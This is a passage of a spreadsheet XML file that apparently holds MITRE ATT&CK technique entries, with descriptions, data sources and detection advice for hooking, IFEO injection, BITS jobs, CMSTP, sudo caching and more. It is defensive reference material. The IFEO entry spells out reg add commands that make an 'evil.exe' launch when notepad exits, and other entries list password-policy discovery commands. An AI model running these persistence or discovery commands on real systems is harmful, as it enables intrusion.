Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</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</si>
  <si>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
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.
Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)
Hooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)</t>
  </si>
  <si>
    <t>persistence,privilege-escalation,credential-access</t>
  </si>
  <si>
    <t>Screensaver</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</si>
  <si>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t>
  </si>
  <si>
    <t>Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. (Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.exe is located in &lt;code&gt;C:\Windows\System32\&lt;/code&gt;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&lt;code&gt;ScreenSaverTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Endgame Process Injection July 2017)</t>
  </si>
  <si>
    <t>Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of extra window memory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take place in the address space of a separate live process. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. (Citation: Endgame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t>
  </si>
  <si>
    <t>AppCert DLLs</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</si>
  <si>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 (Citation: Endgame Process Injection July 2017) 
Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)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</si>
  <si>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Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions: (Citation: Endgame Process Injection July 2017)
* CreateProcess
* CreateProcessAsUser
* CreateProcessWithLoginW
* CreateProcessWithTokenW
* WinExec
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)</t>
  </si>
  <si>
    <t>Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g  notepad.exe”).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&lt;code&gt;&lt;executable&gt;&lt;/code&gt;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IEFO and silent process exit Registry values in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)
* &lt;code&gt;reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512&lt;/code&gt;
* &lt;code&gt;reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1&lt;/code&gt;
* &lt;code&gt;reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"&lt;/code&gt;
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.
Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)</t>
  </si>
  <si>
    <t>privilege-escalation,persistence,defense-evasion</t>
  </si>
  <si>
    <t>SSH Hijacking</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate, depending upon the network environment and how it is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Also monitor user SSH-agent socket files being used by different users.</t>
  </si>
  <si>
    <t>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 (Citation: Slideshare Abusing SSH) (Citation: SSHjack Blackhat) (Citation: Clockwork SSH Agent Hijacking) Compromising the SSH agent also provides access to intercept SSH credentials. (Citation: Welivesecurity Ebury SSH)
[SSH Hijacking](https://attack.mitre.org/techniques/T1184) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it injects into an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Man in the Browser</t>
  </si>
  <si>
    <t>Authentication logs,Packet capture,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications</t>
  </si>
  <si>
    <t>Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)
A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)
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 (Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>Monitor and analyze calls to CreateTranscation, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>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leverage TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055) called Process Doppelgänging. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext.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t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>File monitoring,Network protocol analysis,Network device logs,Process use of network</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause.
Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>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or reuse it for [Pass the Hash](https://attack.mitre.org/techniques/T1075).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</si>
  <si>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Multi-hop Proxy</t>
  </si>
  <si>
    <t>Network protocol analysis,Netflow/Enclave netflow</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</si>
  <si>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[Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.</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</si>
  <si>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</si>
  <si>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Drive-by Compromise</t>
  </si>
  <si>
    <t>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser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</si>
  <si>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A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. This can happen in several ways, but there are a few main components: 
Multiple ways of delivering exploit code to a browser exist, including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, cross-site scripting.
* Malicious ads are paid for and served through legitimate ad providers.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attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring. (Citation: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t>
  </si>
  <si>
    <t>initial-access</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>Packet capture,Web logs,Web application firewall logs,Application logs</t>
  </si>
  <si>
    <t>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</si>
  <si>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The use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL) (Citation: NVD CVE-2016-6662), standard services (like SMB (Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services. (Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).
For websites and databases, the OWASP top 10 gives a good list of the top 10 most common web-based vulnerabilities. (Citation: OWASP Top 10)</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Process use of network,Windows event logs</t>
  </si>
  <si>
    <t>Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.
Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).</t>
  </si>
  <si>
    <t>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[Regsvr32](https://attack.mitre.org/techniques/T1117)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whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>Packet capture,Web proxy,Email gateway,Detonation chamber,SSL/TLS inspection,DNS records,Mail server</t>
  </si>
  <si>
    <t>Windows,macOS,Linux</t>
  </si>
  <si>
    <t>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this technique usually involves user interaction on the endpoint, many of the possible detections for Spearphishing Link take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>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or verify the receipt of an email (i.e. web bugs/web beacons).</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Network intrusion detection system,Detonation chamber,Email gateway,Mail server</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Anti-virus,Web proxy</t>
  </si>
  <si>
    <t>Because most common third-party services used for spearphishing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and [Scripting](https://attack.mitre.org/techniques/T1064).</t>
  </si>
  <si>
    <t>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</si>
  <si>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Supply Chain Compromise</t>
  </si>
  <si>
    <t>Web proxy,File monitoring</t>
  </si>
  <si>
    <t>Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.</t>
  </si>
  <si>
    <t>Supply chain compromise is the manipulation of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software update/distribution mechanisms
* Compromised/infected system images (multiple cases of removable media infected at the factory)
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics  on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)</t>
  </si>
  <si>
    <t>Control Panel Items</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,Windows Registry,Windows event logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor and analyze activity related to items associated with CPL files, such as the Windows Control Panel process binary (control.exe) and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: &lt;code&gt;control.exe file.cpl&lt;/code&gt;) before [Rundll32](https://attack.mitre.org/techniques/T1085) is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1085) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace&lt;/code&gt; and &lt;code&gt;HKEY_CLASSES_ROOT\CLSID\{GUID}&lt;/code&gt;. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the &lt;code&gt;Cpls&lt;/code&gt; and &lt;code&gt;Extended Properties&lt;/code&gt; Registry keys of &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Control Panel&lt;/code&gt;. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically (&lt;code&gt; WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);&lt;/code&gt;) or from a command line (&lt;code&gt;control.exe /name {Canonical_Name}&lt;/code&gt;). (Citation: Microsoft Implementing CPL)
* Some Control Panel items are extensible via Shell extensions registered in &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers&lt;/code&gt; where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)
Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)</t>
  </si>
  <si>
    <t>Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)
For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>API monitoring,Packet capture,Windows event logs</t>
  </si>
  <si>
    <t>BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (&lt;code&gt;bitsadmin /list /allusers /verbose&lt;/code&gt;). (Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)  (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016)
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS)</t>
  </si>
  <si>
    <t>Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). (Citation: Microsoft COM) (Citation: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[PowerShell](https://attack.mitre.org/techniques/T1086)  (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016)</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)
Enable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)
Utilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)
* HKLM\SOFTWARE\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept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 (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>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Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting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Hijacking](https://attack.mitre.org/techniques/T1038).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>Application logs,Authentication logs,Third-party application logs</t>
  </si>
  <si>
    <t>Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.</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</si>
  <si>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
Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems.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t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Asset management,Data loss prevention</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
    <t>Computer accessories, computers, or networking hardware may be introduced into a system as a vector to gain execution. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the middle encryption breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.</t>
  </si>
  <si>
    <t>Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). An adversary may attempt to access detailed information about the password policy used within an enterprise network.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(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
### Windows
* &lt;code&gt;net accounts&lt;/code&gt;
* &lt;code&gt;net accounts /domain&lt;/code&gt;
### Linux
* &lt;code&gt;chage -l &lt;username&gt;&lt;/code&gt;
* &lt;code&gt;cat /etc/pam.d/common-password&lt;/code&gt;
### macOS
* &lt;code&gt;pwpolicy getaccountpolicies&lt;/code&gt;</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands and/or spawning child processes. (Citation: RSA Forfiles Aug 2017)</t>
  </si>
  <si>
    <t>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[Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106).</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>Anti-virus,System calls,Process monitoring</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office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</si>
  <si>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Link](https://attack.mitre.org/techniques/T1192).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[Spearphishing Attachment](https://attack.mitre.org/techniques/T1193), [Spearphishing Link](https://attack.mitre.org/techniques/T1192), and [Spearphishing via Service](https://attack.mitre.org/techniques/T1194).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</si>
  <si>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User Execution</t>
  </si>
  <si>
    <t>Anti-virus,Process command-line parameters,Process monitoring</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</si>
  <si>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execuited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and [Scripting](https://attack.mitre.org/techniques/T1064).</t>
  </si>
  <si>
    <t>An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via [Spearphishing Link](https://attack.mitre.org/techniques/T1192) that leads to exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</t>
  </si>
  <si>
    <t>Port Knocking is a well-established method used by both defenders and adversaries to hide open ports from access. To enable a port, an adversary sends a series of packets with certain characteristics before the port will be opened. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports, but can involve unusual flags, specific strings or other unique characteristics. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. 
This technique has been observed to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t>
  </si>
  <si>
    <t>defense-evasion,persistence,command-and-control</t>
  </si>
  <si>
    <t>Sudo Caching</t>
  </si>
  <si>
    <t>This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>The &lt;code&gt;sudo&lt;/code&gt; command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments." (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a &lt;code&gt;timestamp_timeout&lt;/code&gt; that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Adversaries can abuse poor configurations of this to escalate privileges without needing the user's password. &lt;code&gt;/var/db/sudo&lt;/code&gt;'s timestamp can be monitored to see if it falls within the &lt;code&gt;timestamp_timeout&lt;/code&gt; range. If it does, then malware can execute sudo commands without needing to supply the user's password. When &lt;code&gt;tty_tickets&lt;/code&gt; is disabled, adversaries can do this from any tty for that user. 
